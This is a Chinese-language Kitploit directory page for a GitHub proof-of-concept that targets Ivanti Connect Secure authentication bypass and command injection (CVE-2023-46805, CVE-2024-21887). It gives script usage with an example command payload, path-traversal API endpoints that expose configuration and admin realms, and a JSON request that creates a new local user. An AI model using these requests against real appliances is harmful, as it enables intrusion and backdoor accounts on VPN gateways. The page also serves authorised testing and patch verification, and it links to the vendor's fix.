Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-46805_CVE-2024-21887 — Ivanti ICS 9.x、22.x 及 Ivanti Policy Secure 的 Web 组件中存在一个身份验证绕过漏洞,允许远程攻击者通过绕过控制检查来访问受限资源。 | Kitploit
工具/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Ivanti ICS 9.x、22.x 及 Ivanti Policy Secure 的 Web 组件中存在一个身份验证绕过漏洞,允许远程攻击者通过绕过控制检查来访问受限资源。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
23432年前Kitploit 审核通过

CVE-2023-46805

Ivanti ICS 9.x、22.x 及 Ivanti Policy Secure 的 Web 组件中存在一个认证绕过漏洞,允许远程攻击者绕过控制检查访问受限资源。

用法: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

注意: chmod +x CVE-2023-46805.sh
需要 app curl + json_pp

如果存在漏洞,你应该能看到一些内容:

image

CVE-2024-21887

Ivanti Connect Secure (9.x, 22.x) 和 Ivanti Policy Secure 的 Web 组件中存在一个命令注入漏洞,允许经过身份验证的管理员发送特制请求并在设备上执行任意命令。

  • 运行 poc(将尝试两个入口点)

用法: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

如果存在漏洞,你应该能看到一些内容并且你的 payload 应该生效: image

注意: chmod +x CVE-2024-21887.sh
需要 app curl, xxd, tr & sed

重要信息

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

  • 创建账号 /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



解决方法/修复:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

致谢:https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


更多关于我 ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ 免责声明: 重要提示:本脚本仅供教育、道德测试和合法使用!未经明确许可,请勿在任何系统或网络上使用。未经授权访问计算机系统和网络是违法的,被发现进行未经授权活动的用户将面临法律制裁。作者对因滥用此脚本造成的任何损害概不负责。

下载工具